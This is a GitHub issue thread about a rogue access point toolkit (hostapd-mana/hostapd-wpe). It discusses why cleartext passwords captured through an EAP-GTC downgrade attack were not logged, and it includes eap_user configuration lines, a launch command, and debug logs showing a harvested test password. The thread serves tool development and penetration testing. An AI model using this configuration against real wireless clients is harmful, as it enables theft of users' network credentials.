Creds not logged

[Lexus89]

When performing a EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs?

hostapd.eap_user:

"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]

Hostapd log:

EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72
EAP-PEAP: received Phase 2: code=2 identifier=12 length=11
EAP-Identity: Peer identity - hexdump_ascii(len=6):
68 61 63 6b 65 72 hacker
MANA (EAP) : identity: hacker
...
EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31
EAP-PEAP: received Phase 2: code=2 identifier=14 length=15
EAP-GTC: Response - hexdump_ascii(len=10):
70 61 73 73 77 6f 72 64 30 31 password01
EAP-GTC: Done - Failure
EAP-PEAP: Phase2 method failed
EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ
EAP: EAP entering state METHOD_REQUEST
EAP: building EAP-Request: Identifier 15
EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04

[singe]

I think you may have just found the bug I've been chasing but unable to replicate. Will take a look thanks.

…

Sent from my phone

On 02 May 2017, at 2:18 PM, Lexus89 ***@***.***> wrote: When performing a EAP dumb-down attack by asking for GTC, the plain text credentials do not appear in the log (also referenced #12). I set the ennode configuration to a log file. Perhaps not all methods are stored in logs? hostapd.eap_user: "t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2] Hostapd log: EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=11): 02 0c 00 0b 01 68 61 63 6b 65 72 EAP-PEAP: received Phase 2: code=2 identifier=12 length=11 EAP-Identity: Peer identity - hexdump_ascii(len=6): 68 61 63 6b 65 72 hacker MANA (EAP) : identity: hacker ... EAP-PEAP: Decrypted Phase 2 EAP - hexdump(len=15): 02 0e 00 0f 06 70 61 73 73 77 6f 72 64 30 31 EAP-PEAP: received Phase 2: code=2 identifier=14 length=15 EAP-GTC: Response - hexdump_ascii(len=10): 70 61 73 73 77 6f 72 64 30 31 password01 EAP-GTC: Done - Failure EAP-PEAP: Phase2 method failed EAP-PEAP: PHASE2_METHOD -> FAILURE_REQ EAP: EAP entering state METHOD_REQUEST EAP: building EAP-Request: Identifier 15 EAP-PEAP: Encrypting Phase 2 data - hexdump(len=4): 04 0f 00 04 — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.

[derekkddj]

Hi,
Did you find how to make EAP dumb-down attack works in hostapd-mana? Y see that the android device just try to use MSCHAPv2 instead of GTC, even when it does not have 2phase authentication method selected.
WIth freeradius-wpe I can make this attack works, but not with hostpad-mana.

Regards

[Lexus89]

I believe it was by changing the order of methods in the hostapd.eap_user file..

[derekkddj]

Hi,

Thanks for the reply, do you have an example file I can see?
I am not hable to make this attack works..
Maybe is using this line of configuration?:
"t" PEAP,GTC,TTLS-MSCHAPV2,MSCHAPV2,MD5,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS "1234test" [2]

Regards

[singe]

I log PAP plaintext, not GTC. Will add it. Thanks.

[W00t3k]

https://twitter.com/W00Tock/status/1019251419310972930

Edit file "hostapd-wpe.eap_user" (You can replace PEAP with FAST)

PEAP [ver=1]
"t" GTC "password" [2]
./hostapd-wpe hostapd-wpe.conf -ddddd
-snip- EAP-GTC: Response password: -snip-

By configuring the eap)user file, you can request from Apple and Android devices a GTC clear text password - which is shown in the debug console, but is currently not logged.

Thanks Singe, thought this might help you find that bug...

[singe]

Thanks everyone. I now log GTC, you can see the code at https://github.com/sensepost/hostapd-mana/blob/master/src/eap_server/eap_server.c#L2136